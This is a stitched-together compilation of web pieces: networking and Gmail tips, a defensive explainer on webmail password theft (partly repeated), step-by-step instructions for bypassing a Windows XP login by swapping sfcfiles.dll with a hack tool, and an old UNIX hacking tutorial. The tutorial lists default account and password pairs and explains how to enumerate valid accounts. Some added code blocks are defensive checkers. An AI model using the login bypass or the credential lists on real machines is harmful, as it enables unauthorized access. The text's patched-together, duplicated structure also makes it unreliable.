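            for name, fields in parse_ipconfig(text).items()}


if __name__ == "__main__":
    for name, status in diagnose(SAMPLE_OUTPUT).items():
        print(f"{name}: {status}")
```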
Limited or No Connectivity:
One of the most common, and sometimes the most frustrating, annoyances of not being able to access the internet is the limited or no connectivity sign. If you just upgraded to Service Pack 2 and are experiencing the limited or no connectivity error, you can try downloading this patch from Microsoft.
* Releasing and renewing your DHCP via your router. Your computer will have to access your router's settings via your web browser; if you're not sure how to do this, check your router's homepage. With Linksys I connect via the default gateway listed in ipconfig above. Example default gateway: 192.168.1.1. So in your browser type in http://192.168.1.1. It will ask for your password, which varies from router to router; try typing admin in either the username or only the password. If you're not sure, contact your router's customer support. On my Linksys the buttons to release and renew your DHCP are found under 'status'.
* Assign your own IP. While not recommended unless you’re an advanced user, you can assign yourself an IP address if there happens to be an IP conflict in your system. Right click on your active internet connection via Network Connections and drop down to repair. On the General tab highlight Internet Protocol (TCP/IP) and click Properties. By default it should obtain an IP address automatically. From here you can specify your own IP address that another computer on your network may not be using. Generally it follows a pattern of Default Gateway: 192.168.1.1, IP Address: 192.168.1.100 for one computer, 192.168.1.102 for another computer and so on. Try to keep in line and just pick one close to it, such as 192.168.1.105.
* Try resetting your winsock settings. Start > Run > cmd then type in netsh winsock reset.
Other Tips:
If you just reinstalled your operating system, be sure to check that the drivers for your network device are correct. Start > right click My Computer > Hardware > Device Manager. From here you can view what you have and update it, or go to your computer manufacturer’s homepage to see if there are any updated drivers. If you're unable to connect on your computer, you can download the updates to a CD-ROM or flash drive on another machine and transfer them to your computer.
If you're using an adapter, make sure that the signal and your adapter are on the same wavelength. For example, I had a wireless G adapter picking up a signal from a wireless B router. Even though it worked for a while it stopped working because they are actually broadcasting and receiving on different frequencies. Check your router and adapter for more information. Sometimes the newer versions broadcast on different frequencies to cover the bases, while the older models may just broadcast in one.
Don't forget to have a good and active security system on your computer, including a firewall, anti-virus and spyware scanners. Malware issues can also interfere with your computer's connectivity.
How To: Hack Gmail
Tired of stingy ISPs imposing arbitrary email restrictions on you? Yeah, so are we. 1MB attachment limits, 25MB storage limits, and restricted SMTP servers are sooo 1997. For a 21st-Century mail experience, step up to Gmail.
We know what you’re thinking: Webmail is webmail. But with 2.7GB of storage, 10MB attachment allowances, and an array of easy hacks that let you customize your mail account in almost any way you like, Gmail may be the most powerful e-mail tool the world has ever known. But enough of our yammering. Here’s how to turn your Gmail account into a messaging dynamo, and more.
1. Use Gmail as an Online Storage Vault
Need to keep important files handy? You don’t necessarily have to shell out 100 bucks for a high-capacity thumb drive. Instead, use Gmail’s free 2.7GB of storage as an off-site backup for the files you need access to. The easiest way is to simply attach your file to an email and shoot it to your Gmail account. Then you can retrieve it at any time just by logging in and running a quick search of your inbox. Of course, Gmail’s 10MB attachment limit means you won’t be able to archive massive documents. But it’s a great way to keep your most essential files handy wherever there’s an Internet connection.
To take even greater advantage of Gmail’s free storage space, you’ll need to download a helper app. Firefox users can download Gmail Space from Mozilla’s Firefox Add-ons library, which turns the web browser into an easy-to-use file explorer. The extension lets you drag and drop files directly into Gmail’s storage space, without having to worry about the attachment size limit.
Alternatively, you can download Gmail Drive Shell Extension (free) for more ubiquitous access throughout your Windows PC. Gmail Drive Shell Extension sets up your Gmail storage space as a network drive on your PC, which you can access simply by double-clicking the GMail Drive icon in My Computer and then entering your Gmail username and password. Once you log in, your Gmail storage will act just like any other drive on your PC. It even works with Windows Vista.
2. Filter Your Mail with Positive Thinking
The lowly plus sign gets little respect in this crazy, mixed-up world. But if you use it the right way with Gmail, it could become your new best friend. By adding a plus sign and a filter tag to your own Gmail address, you can figure out which of the sites that you’ve brazenly given your address to are turning around, stabbing you in your tender, fleshy backside, and selling it to every half-witted Pr0p3cia spammer on the net.
This little hack doesn’t require a single tweak to your Gmail settings. Instead, just use the plus/tag every time you enter your address into an online form. Our favorite method is to use the name of the site you’re visiting as the tag, so it’s easy to track later on. So if you buy some vintage kicks at Raresneakers.com, enter your email address as username+raresneakers@gmail.com.
Gmail ignores the plus sign and everything that comes after it, so messages sent to that address will still make their way to you. But if that site sells your address to its spamifying associates, you’ll know just by peeking at the To address in the header. How you choose to exact revenge is entirely up to you.
You can also use this tip to set up filters for registration codes, listservs, and anything else!
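The header check described above can be run over a batch of saved messages. This is an added example, not part of the original article: it pulls the plus tag from each recipient header and reports tags that arrive from a sender whose domain does not contain the tag. The messages and every domain other than Raresneakers.com are constructed, and naming each tag after the site's domain is the assumption the comparison relies on.

```python
from email import message_from_string
from email.utils import getaddresses, parseaddr

# Constructed sample messages (not real mail). "username" is the placeholder
# account name used in the article.
SAMPLE_MESSAGES = [
    "From: Orders <orders@raresneakers.com>\n"
    "To: username+raresneakers@gmail.com\n"
    "Subject: Your order has shipped\n\nThanks for your purchase.\n",
    "From: deals@cheap-pills.example\n"
    "To: username+raresneakers@gmail.com\n"
    "Subject: Best prices\n\nBuy now.\n",
    "From: News <news@forum.example>\n"
    "To: Username+Forum@gmail.com\n"
    "Subject: Weekly digest\n\nNew threads this week.\n",
    "From: friend@example.org\n"
    "To: username@gmail.com\n"
    "Subject: Lunch?\n\nFree on Friday?\n",
]


def split_plus_address(address):
    """Return (base address, tag); tag is None when there is no +tag."""
    local, _, domain = address.lower().rpartition("@")
    base, plus, tag = local.partition("+")
    return f"{base}@{domain}", (tag if plus and tag else None)


def recipient_tags(msg, mailbox):
    """Collect the plus tags used to reach `mailbox` in this message."""
    headers = []
    for name in ("To", "Cc", "Delivered-To"):
        headers.extend(msg.get_all(name, []))
    tags = set()
    for _display, addr in getaddresses(headers):
        base, tag = split_plus_address(addr)
        if base == mailbox.lower() and tag:
            tags.add(tag)
    return tags


def sender_domain(msg):
    """Domain part of the From address, lowercased."""
    _display, addr = parseaddr(msg.get("From", ""))
    return addr.lower().rpartition("@")[2]


def find_leaks(raw_messages, mailbox):
    """Map each tag to the sender domains that used it but do not match it.

    A tag matches a sender when it equals one label of the sender's domain,
    e.g. tag "raresneakers" and domain "mail.raresneakers.com".
    """
    leaks = {}
    for raw in raw_messages:
        msg = message_from_string(raw)
        domain = sender_domain(msg)
        for tag in recipient_tags(msg, mailbox):
            if tag not in domain.split("."):
                leaks.setdefault(tag, set()).add(domain)
    return {tag: sorted(domains) for tag, domains in leaks.items()}


if __name__ == "__main__":
    for tag, domains in find_leaks(SAMPLE_MESSAGES, "username@gmail.com").items():
        print(f"address tagged '{tag}' is being used by: {', '.join(domains)}")
```

From headers can be forged and many sites send through third-party mailers, so treat each hit as a lead to check against the full headers.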
3. Take Notice with a Notifier
You don’t have to log into Gmail every time you want to see if you’ve got mail. Instead, download a Gmail notifier. Although it isn’t prominently featured on the Gmail site, Google’s own Gmail Notifier is a free download. If you’d rather not install a system tray icon, you can always use a Gmail plugin for Firefox. Gmail Checker is a low-profile plugin that requires barely a second thought to keep track of. But if you want to check multiple Gmail accounts from within Firefox, check out Gmail Manager.
4. Import Your Old Mail into Gmail
If you decide to switch to Gmail completely, you’ll probably want to bring your old contacts and messages along for the ride. Importing your contacts is easy (just click Import in the upper-right corner of the Contacts screen and select a CSV file exported from your old mail app). Importing your old email takes a little more doing.
One of the easiest ways to get your old mail into Gmail is to download Mark Lyon’s Gmail Loader (aka GML), which you can download from www.marklyon.org/gmail/. This simple little utility will transfer messages in the mBox format (including Thunderbird, Eudora, and Netscape mailboxes) into Gmail. Transferring your mail is as easy as downloading the app, launching it, entering your Gmail login info, browsing for your mailbox folder, and clicking Send to Gmail.
To transfer Outlook mailboxes, try Outport, which can transfer messages from Outlook to a host of other mail readers, including Gmail. Like GML, Outport has a fairly simple GUI that’s easy to navigate, so you can get the job done quickly and with a minimum of mucking around.
Sadly, Gmail will stamp all the imported mail with the date on which you do the import, rather than preserve the original received dates from each of your imported messages. However, you can still find imported messages by date, because the original received dates are retained within the body of the messages. So simply searching for “Nov 06” will help you find all messages from November of 2006.
5. Turn Gmail into an MP3 Player
In the interest of convenience, Gmail has its own built-in audio player for use with file attachments. You can put it to work as an online MP3 player by using labels and mail filters to sort your files.
First, set up a label called MP3. Next, set up a filter that searches for MP3 content by clicking Create a Filter at the top of the screen. Enter “mp3” in the “Has the words” field and check the box marked “Has attachment.” This will search for any messages with music files attached (including any you may have uploaded using the GMail Drive Shell Extension mentioned earlier). Now click Next Step and check the box marked “Apply the label” and choose the label MP3. Now any time you want to pump up some jams, you can click the MP3 label on the left side of your screen and pick a tune from the list.
6. Email Impersonator
Just because you’ve switched to Gmail, that doesn’t mean you have to give up your old email address. Gmail lets you send messages that appear to come from another address. In the settings pane, click Accounts and then choose “Add another email address,” then enter the address you’d like to use. To prevent you from ruining someone else’s life by masquerading as them on the Internet, Google will send a test message to verify that the address belongs to you. Then you can choose to make that new address your default identity, so nobody needs to know that you’re really sending from Gmail. To complete the transformation, set up a forwarder for your other address’s account, so that all of your mail reaches your Gmail account.
HOW TO HACK AOL®, YAHOO® AND HOTMAIL®
We get numerous calls from people who want to recover AOL®, Yahoo® or Hotmail® or other online and email passwords. We do not do this type of work. Many of these people claim that they have lost their passwords because they have been hacked and now need to get their password back. As we have reviewed information on the web, we found very little real information about the actual techniques that could be used to hack these services. So we decided to pull together a detailed explanation.
What follows is a detailed explanation of the methodologies involved. We do not condone any illegal activity and we clearly mention in this article techniques that are illegal. Sometimes these methods are known as "Phishing."
THE HOAX
Let's dispose of one technique that is absolutely a hoax (meaning a fraud: something intended to deceive; deliberate trickery intended to gain an advantage.) If you see a newsgroup post or web page with something like the following, it is a hoax and will not work.
: : : (([[THIS REALLY WORKS ]])) : : :
(1) send an E-mail to passwordrecovery@yourdomainhere.com
(2) In the subject box type the screenname of the person whose password you wish to steal
(3) In the message box type the following: /cgi-bin/start?v703&login.USER=passmachine&class=supervisor&f={your aol password}&f=27586&javascript=ACTIVE&rsa
(4) Send the e-mail with priority set to "high" (red ! in some mailprograms)
(5) wait 2-3 minutes and check your mail
(6) Read the message.-Where YOUR password was typed before, NOW, the password of the screenname in the code string is there!!!
Why does this work? It's a special decryption-server that AOL-employees can use to decrypt passwords. The aolbackdoor account is a bot that reads your authentication from the message body and identifying you as a valid AOL Staff-member, you will get the password mailed back to you. The trick is that this Bot's script seems to be a little bit buggy and it automatically recognises you as a supervisor (AOL-Staff member), even if you use a normal AOL account. This means, that EVERYONE having a valid AOL account can hack as many other accounts as he wants.
This is just a scam to steal your password and may explain some of the calls we get from people saying they were hacked. Never give your password to anyone. No legitimate web service or customer service representative will ask for it or need it. There is no magic email address or series of commands that will reveal the passwords of users.
LOCALLY STORED PASSWORDS
Most browsers, including Internet Explorer® and Netscape®, the AOL® client, and Windows® Dial-Up Connections allow you the option to store passwords. These passwords are stored on the local machine and (depending upon where and how they are stored) there is usually a method of recovering them. Storing any password locally is insecure and may allow the password to be recovered by anyone who has access to the local machine. While we are not currently aware of any program to recover locally stored AOL® passwords, we do not suggest that these are secure. Software does exist that can recover most of the other types of locally stored passwords.
TROJAN
A Trojan is a program that is sent to a user that allows an attacker to control functions of the target computer, recover information from the target or to delete or damage files on the target. The name Trojan is given because the program will usually come attached to some other program or file that entices you to run it. There are a wide variety of Trojans, any number of which can be programmed to capture passwords as they are typed and to email or transmit them to a third party. To protect yourself against Trojans, you should never execute or download software or files that are not from a trusted source. It is critical that anyone working on the internet use a virus protection program (which should catch most Trojans). Note that since a Trojan requires the password to be typed or stored in order to be recovered, this is not an effective way to recover your own password. It could explain, however, how someone could lose their password to a hacker. Sending someone a Trojan program is certainly illegal and we do not recommend or condone this activity. A Trojan is unlikely to be effective in recovering a particular account password since it requires the target to install it. However, hackers will often bulk mail Trojans to thousands of people in the hope that a small percentage will get caught. Legitimate account holders who may have been caught by a Trojan and can authenticate themselves should contact their service provider to have their account passwords reset.
KEYLOGGER
A keylogger is a program or piece of hardware that records all keyboard keystrokes to an encrypted file which can then be read later. Based on the order of the keystrokes, it is usually easy to identify the password(s) from the file later. Like the Trojan, this also requires that someone actually type the password. Keyloggers come in two types: hardware and software. A hardware keylogger can be fitted between the keyboard cable and the computer and can be activated with a few keystrokes. It is then left in place until after the password that you are looking to recover is typed. Later it is removed and the file of keystrokes is examined for the password. A hardware keylogger is undetectable by anti-virus software. A software keylogger is installed on a system and effectively has the same function; however, it is a little bit more complex to use since it must be installed to run stealthily to be effective. A keylogger could be used to steal a password from someone who is using an office computer or sharing a computer. It is possible that installing and using such a device or piece of software could be illegal depending upon whether the target has a presumption of privacy when using the computer on which the keylogger is installed.
IMPERSONATION
It is possible to impersonate a program on a computer by launching windows that look like something else. For instance, let's say you log in to the MSN® service and visit a website (in this case a hostile website). It would be possible for this website to pop up some windows that look like something else. They could look almost identical to windows that an inexperienced user might expect from his local computer. The user could be fooled into submitting information to the hostile website. For instance, consider the effect of seeing the following series of windows:
If these could trick you into entering your password, then you could end up sending your password to the attacker. Windows such as these could be created to mirror virtually any program or series of actions. Your browser will likely identify your operating system and your IP address might identify your ISP. Therefore, a hostile website could target you with a series of screen shots that look exactly as they should on your system. The key is that the screen shots are not coming from your system, but are coming from the hostile website. First, creating such a hostile website is probably fraudulent and illegal. We do not recommend or condone this activity. To protect yourself against this type of attack, make sure to configure your browser for high security and enable warnings for any code that is executed on your system.
SNIFFING
If two people do not share the same computer, but do share the same network, it may be possible for one to sniff the other's packets as they sign on. The traffic between your computer and the internet site you are accessing may be able to be recorded and decrypted or "played back." This is not a simple attack to execute, but is possible if two people are close to one another and share a hub. Again, this is likely to be illegal and we do not condone this activity.
BRUTE-FORCE ATTACK
Many people want to find software to perform a brute-force attack. This is really impractical. It would take hundreds of thousands of years to attempt any kind of reasonable brute-force attack on AOL®, Yahoo® or Hotmail® and this would expand exponentially if the password is longer than the minimum length. Using multiple computers or multiple sessions could reduce this to merely thousands of years. This is highly illegal since these services own the servers on which an account is hosted. Even if you are hacking your own account, you don't own the servers and the service is going to monitor and log this activity. It is extremely unlikely that you could recover a password in this way, but it is extremely likely that you'd be arrested and prosecuted for doing this.
SOCIAL ENGINEERING
Social engineering is the name given to the art of attacking the person, rather than the computer or system. The basic principle is that many people can be talked into giving someone else their id and password if they think it is someone that they can trust. For instance, I might call someone and say I was from AOL and that I was finally getting around to responding to their technical support question. I would then ask you to describe the problem that you are having and tell you that we have a solution. However, I just need to verify the account. Can you give me the username and password again? A surprising number of people would fall for this obvious scam. There is no limit as to how elaborate this can be. The more information that is given by the caller, the more realistic or believable the call is. Again, never give your password to anyone. No legitimate customer service representative will ask for this information.
These are the basic methods that we are aware of for hacking an AOL®, Yahoo®, Hotmail® or any other dial-up or on-line password. Hopefully this will answer some questions and help you protect yourself against these attacks.
Password Crackers, Inc. does offer an America Online (AOL)® Personal Filing Cabinet (.pfc) conversion service. We can convert AOL® Personal Filing Cabinets (.pfc) to either Netscape®, Microsoft Outlook® (.pst) or text (.txt) formats. You can get more information about this service here.
What follows is a detailed explanation of the methodologies involved. We do not condone any illegal activity and we clearly mention in this article techniques that are illegal. Sometimes these methods are known as "Phishing."
THE HOAX
Let's dispose of one technique that is absolutely a hoax (meaning a fraud: something intended to deceive; deliberate trickery intended to gain an advantage.) If you see a newsgroup post or web page with something like the following, it is a hoax and will not work.
: : : (([[THIS REALLY WORKS ]])) : : :
(1) send an E-mail to passwordrecovery@yourdomainhere.com
(2) In the subject box type the screenname of the person whose password you wish to steal
(3) In the message box type the following: /cgi-bin/start?v703&login.USER=passmachine&class=supervisor&f={your aol password}&f=27586&javascript=ACTIVE&rsa
(4) Send the e-mail with priority set to "high" (red ! in some mailprograms)
(5) wait 2-3 minutes and check your mail
(6) Read the message.-Where YOUR password was typed before, NOW, the password of the screenname in the code string is there!!!
Why does this work? It´s a special decryption-server that AOL-employees can use to decrypt passwords.The aolbackdoor account is a bot that reads your authentification from the message body and identifiying you as a valid AOL Staff-member, you will get the password mailed back to you. The trick is that this Bot´s script seems to be a little bit buggy and it automatically recogises you as an supervisor (AOL-Staff member), even if you use a normal AOL account. This means, that EVERYONE having a valid AOL account can hack as many other accounts as he wants.
This is just a scam to steal your password and may explain some of the calls we get from people saying they were hacked. Never give your password to anyone. No legitimate web service or customer service representative will ask for it or need it. There is no magic email address or series of commands that will reveal the passwords of users.
LOCALLY STORED PASSWORDS
Most browsers, including Internet Explorer® and Netscape®, the AOL® client, and Windows® Dial-Up Connections allow you the option to store passwords. These passwords are stored on the local machine and (depending upon where and how they are stored) there is usually a method of recovering them. Storing any password locally is insecure and may allow the password to be recovered by anyone who has access to the local machine. While we are not currently aware of any program to recover locally stored AOL® passwords, we do not suggest that they are secure. Software does exist that can recover most of the other types of locally stored passwords.
How to Hack Into a Windows XP Computer Without Changing Password
Another method to log in to a password-protected Windows machine, even if you do not have the password, is to make Windows accept any password. There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone else's computer without proper authorisation.
Steps to Hack into a Windows XP Computer without changing password:
1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL HERE.
3. Unzip the downloaded dreampackpl.zip and you’ll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is “1” if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing: “ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
10. Copy the hacked file from CD to system32 folder. Type: “copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
11. Type “exit”, take out disk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and enable the options and enable the god command.
15. Type “god” in the password field to get in Windows.
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.
Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive
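A defender's check for the file swap in steps 9 and 10, as an added example that is not part of the original post: it looks in a System32 directory (for instance on a mounted disk image) for the renamed `sfcfiles.lld` and compares `sfcfiles.dll` with a trusted copy. The function names, the finding strings and the trusted copy (assumed to come from known-good media for the same Windows version and service pack) are assumptions of this example, and the demo files are constructed.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    """Return the SHA-256 hex digest of a file."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def find_ci(directory, name):
    """Case-insensitive lookup, so a Windows volume can be examined from any OS."""
    for entry in Path(directory).iterdir():
        if entry.name.lower() == name.lower():
            return entry
    return None


def check_sfcfiles(system32, trusted_dll):
    """Report signs that sfcfiles.dll was renamed aside and replaced."""
    findings = []
    trusted = sha256_of(trusted_dll)
    dll = find_ci(system32, "sfcfiles.dll")
    aside = find_ci(system32, "sfcfiles.lld")
    if dll is None:
        findings.append("sfcfiles.dll missing")
    elif sha256_of(dll) != trusted:
        findings.append("sfcfiles.dll differs from trusted copy")
    if aside is not None:
        # The page's step 9 leaves the original behind under this name.
        findings.append("sfcfiles.lld present")
        if sha256_of(aside) == trusted:
            findings.append("sfcfiles.lld matches trusted copy (original renamed aside)")
    return findings


def demo():
    """Build two constructed System32 directories and return the findings for each."""
    original = b"constructed stand-in for the genuine sfcfiles.dll"
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        trusted = root / "trusted_sfcfiles.dll"
        trusted.write_bytes(original)

        clean = root / "clean"
        clean.mkdir()
        (clean / "sfcfiles.dll").write_bytes(original)

        swapped = root / "swapped"
        swapped.mkdir()
        (swapped / "SFCFILES.DLL").write_bytes(b"constructed stand-in for a replaced file")
        (swapped / "sfcfiles.lld").write_bytes(original)

        return check_sfcfiles(clean, trusted), check_sfcfiles(swapped, trusted)


if __name__ == "__main__":
    clean_findings, swapped_findings = demo()
    print("clean:  ", clean_findings)
    print("swapped:", swapped_findings)
```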
A Hacking Tutorial
This phile is geared as an UNIX tutorial at first, to let you get more familiar with the operating system. UNIX is just an operating system, as is MS-DOS, AppleDOS, AmigaDOS, and others. UNIX happens to be a multi-user-multi-tasking system, thus bringing a need for security not found on MSDOS, AppleDOS, etc. This phile will hopefully teach the beginners who do not have a clue about how to use UNIX a good start, and may hopefully teach old pros something they didn't know before. This file deals with UNIX SYSTEM V and its variants. When I talk about unix, it's usually about SYSTEM V (rel 3.2).

Where Can I be found? I have no Idea. The Boards today are going Up'n'Down so fast, 3 days after you read this file, if I put a BBS in it where you could reach me, it may be down! Just look for me. I can be reached on DarkWood Castle [If it goes back up], but that board is hard to get access on, but I decided to mention it anyway. I *COULD* Have been reached on jolnet, but......

This file may have some bad spelling, etc, or discrepancies since it was spread out over a long time of writing, because of school, work, Girl friend, etc. Please, no flames. If you don't like this file, don't keep it.

This is distributed under PHAZE Inc. Here are the members (and ex ones)
The Dark Pawn
The Data Wizard
Sir Hackalot (Me)
Taxi (ummm.. Busted)
Lancia (Busted)
The British Knight (Busted)
The Living Pharoah (Busted)
_____________________________________________________________________________
-------------
o Dedication:
-------------
This phile is dedicated to the members of LOD that were raided in Atlanta. The members that got busted were very good hackers, especially The Prophet. Good luck to you guys, and I hope you show up again somewhere.
_____________________________________________________________________________
------------------------
o A little History, etc:
------------------------
UNIX, of course, was invented By AT&T in the 60's somewhere, to be "a programmer's operating system."
While that goal was probably not reached when they first invented UNIX, it seems that now, UNIX is a programmer's OS. UNIX, as I have said before, is a multi-tasking/multi-user OS. It is also written in C, or at least large parts of it are, thus making it a portable operating system. We know that MSDOS corresponds to IBM/clone machines, right? Well, this is not the case with UNIX. We do not associate it with any one computer since it has been adapted for many, and there are many UNIX variants [that is, UNIX modified by a vendor, or such]. Some AT&T computers run it, and also some run MSDOS [AT&T 6300]. The SUN workstations run SunOS, a UNIX variant, and some VAX computers run Ultrix, a VAX version of UNIX. Remember, no matter what the name of the operating system is [BSD, UNIX, SunOS, Ultrix, Xenix, etc.], they still have a lot in common, such as the commands the operating system uses. Some variants may have features others do not, but they are basically similar in that they have a lot of the same commands/datafiles. When someone tries to tell you that UNIX goes along with a certain type of computer, they may be right, but remember, some computers have more than one Operating system. For instance, one person may tell you that UNIX is to a VAX as MSDOS is to IBM/clones. That is untrue, and the only reason I stated that, was because I have seen many messages with info/comparisons in it like that, which confuse users when they see a VAX running VMS.
____________________________________________________________________________
-------------------------------
o Identifying a Unix/Logging in
-------------------------------
From now on, I will be referring to all the UNIX variants/etc as UNIX, so when I say something about UNIX, it generally means all the variants (Unix System V variants that is: BSD, SunOS, Ultrix, Xenix, etc.), unless I state a variant in particular. Okay.
Now it's time for me to tell you how a unix USUALLY greets you. First, when you call up a UNIX, or connect to one however you do, you will usually get this prompt:

login:

Ok. That's all fine and dandy. That means that this is PROBABLY a Unix, although there are BBS's that can mimic the login procedure of an OS (Operating System), thus making some people believe it's a Unix. [Hah!]. Some Unixes will tell you what they are or give you a message before a login: prompt, as such:

Welcome to SHUnix. Please log in.

login:

Or something like that. Public access Unixes [like Public BBSs] will tell you how to logon if you are a new user. Unfortunately, this phile is not about public access Unixes, but I will talk about them briefly later, as a UUCP/UseNet/Bitnet address for mail.

OK. You've gotten to the login prompt! Now, what you need to do here is enter in a valid account. An Account usually consists of 8 characters or less. After you enter in an account, you will probably get a password prompt of some sort. The prompts may vary, as the source code to the login program is usually supplied with UNIX, or is readily available for free. Well, the easiest thing I can say to do to login is basically this: Get an account, or try the defaults. The defaults are ones that came with the operating system, in standard form. The list of some of the Defaults are as follows:

ACCOUNT      PASSWORD
-------      --------
root         root  - Rarely open to hackers
sys          sys / system / bin
bin          sys / bin
mountfsys    mountfsys
adm          adm
uucp         uucp
nuucp        anon
anon         anon
user         user
games        games
install      install
reboot       * See Below
demo         demo
umountfsys   umountfsys
sync         sync
admin        admin
guest        guest
daemon       daemon

The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level accounts, meaning they have sysop power, or total power. Other logins are just "user level" logins meaning they only have power over what files/processes they own. I'll get into that later, in the file permissions section.
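An administrator can check a passwd file for exactly these weaknesses. The following is an added example, not part of the original phile: it flags empty password fields, root-level (UID 0) accounts other than root, accounts sharing one UID, and default account names from the list above that still have a command-interpreter shell. The function name, the finding labels and the sample file are constructed for this example.

```python
from collections import defaultdict

# Account names taken from the tutorial's list of defaults.
DEFAULT_ACCOUNTS = {
    "root", "sys", "bin", "mountfsys", "adm", "uucp", "nuucp", "anon", "user",
    "games", "install", "reboot", "demo", "umountfsys", "sync", "admin",
    "guest", "daemon",
}
# Shells that give a command interpreter; an empty shell field means the default shell.
INTERACTIVE_SHELLS = {"", "sh", "csh", "ksh", "tcsh"}

# Constructed sample in the seven-field passwd layout (not from a real system).
SAMPLE_PASSWD = """\
root:x:0:1:Super User:/:/bin/sh
daemon:x:1:1::/:/bin/false
sync::0:1::/:/bin/sync
install:x:0:1::/usr/install:/bin/sh
guest::100:100:Guest:/usr/guest:/bin/sh
sirhack:x:50:50::/usr/sirhack:/bin/ksh
datawiz:x:50:50::/usr/datawiz:/bin/csh
broken line without fields
"""


def audit_passwd(text):
    """Return a list of (line number, account, finding) tuples for a passwd file."""
    findings = []
    by_uid = defaultdict(list)
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append((lineno, "?", "malformed"))
            continue
        name, password, uid, _gid, _comment, _home, shell = fields
        uid = int(uid)
        by_uid[uid].append(name)
        shell_name = shell.rsplit("/", 1)[-1]

        if password == "":
            # No password at all: anyone who knows the name can log in.
            findings.append((lineno, name, "empty-password"))
        if uid == 0 and name != "root":
            # Any account with UID 0 has root power, whatever it is called.
            findings.append((lineno, name, "extra-uid0"))
        if name in DEFAULT_ACCOUNTS and name != "root" and shell_name in INTERACTIVE_SHELLS:
            findings.append((lineno, name, "default-account-with-shell"))

    # Accounts sharing a UID are the same user as far as the system is concerned.
    for uid, names in sorted(by_uid.items()):
        if len(names) > 1:
            findings.append((0, ",".join(names), f"shared-uid-{uid}"))
    return findings


if __name__ == "__main__":
    for lineno, account, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {account}: {finding}")
```

Default account names are flagged for review only; whether a password equals the account name has to be tested against the system's own password hashes.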
The REBOOT login is what is known as a command login, which just simply doesn't let you into the operating system, but executes a program assigned to it. It usually does just what it says, reboot the system. It may not be standard on all UNIX systems, but I have seen it on UNISYS unixes and also HP/UX systems [Hewlett Packard Unixes]. So far, these accounts have not been passworded [reboot], which is real stupid, if you ask me.

COMMAND LOGINS:
---------------
There are "command logins", which, like reboot, execute a command then log you off instead of letting you use the command interpreter. BSD is notorious for having these, and consequently, so do MIT's computers. Here are some:

rwho   - show who is online
finger - same
who    - same

These are the most useful, since they will give the account names that are online, thus showing you several accounts that actually exist.

Errors:
-------
When you get an invalid Account name / invalid password, or both, you will get some kind of error. Usually it is the "login incorrect" message. When the computer tells you that, you have done something wrong by either entering an invalid account name, or a valid account name, but invalid password. It does not tell you which mistake you made, for obvious reasons. Also, when you login incorrectly, the error log on the system gets updated, letting the sysop(s) know something is amiss.

Another error is "Cannot change to home directory" or "Cannot Change Directory." This means that there is no "home directory", which is essentially the 'root' directory for an account, which is the directory you start off in. On DOS, you start in A:\ or C:\ or whatever, but in UNIX you start in /homedirectory. [Note: The / is used in directories on UNIX, not a \ ]. Most systems will log you off after this, but some tell you that they will put you in the root directory [ '/'].

Another error is "No Shell". This means that no "shell" was defined for that particular account. The "shell" will be explained later.
Some systems will log you off after this message. Others will tell you that they will use the regular shell, by saying "Using the bourne shell", or "Using sh"

-----------------------------
Accounts In General :
-----------------------------
This section is to hopefully describe to you the user structure in the UNIX environment.

Ok, think of UNIX having two levels of security: absolute power, or just a regular user. The ones that have absolute power are those users at the root level. Ok, now is the time to think in numbers. Unix associates numbers with account names. Each account will have a number. Some will have the same number. That number is the UID [user-id] of the account. The root user id is 0. Any account that has a user id of 0 will have root access. Unix does not deal with account names (logins) but rather the number associated with them. For instance, if my user-id is 50, and someone else's is 50, we both have absolute power over each other, but no-one else.
_____________________________________________________________________________
---------------
Shells :
---------------
A shell is an executable program which loads and runs when a user logs on, and is in the foreground. This "shell" can be any executable program, and it is defined in the "passwd" file which is the userfile. Each login can have a unique "shell". Ok. Now the shell that we usually will work with is a command interpreter. A command interpreter is simply something like MSDOS's COMMAND.COM, which processes commands, and sends them to the kernel [operating system]. A shell can be anything, as I said before, but the one you want to have is a command interpreter. Here are the usual shells you will find:

sh   - This is the bourne shell. It is your basic Unix "COMMAND.COM". It has a "script" language, as do most of the command interpreters on Unix systems.
csh  - This is the "C" shell, which will allow you to enter "C" like commands.
ksh  - this is the korn shell.
       Just another command interpreter.
tcsh - this is one, which is used at MIT I believe. Allows command editing.
vsh  - visual shell. It is a menu driven deal. Sorta like.. Windows for DOS
rsh  - restricted shell OR remote shell. Both Explained later.

There are many others, including "homemade" shells, which are programs written by the owner of a unix, or for a specific unix, and they are not standard. Remember, the shell is just the program you get to use and when it is done executing, you get logged off. A good example of a homemade shell is on Eskimo North, a public access Unix. The shell is called "Esh", and it is just something like a one-key-press BBS, but hey, it's still a shell. The Number to eskimo north is 206-387-3637. [206-For-Ever]. If you call there, send Glitch Lots of mail.

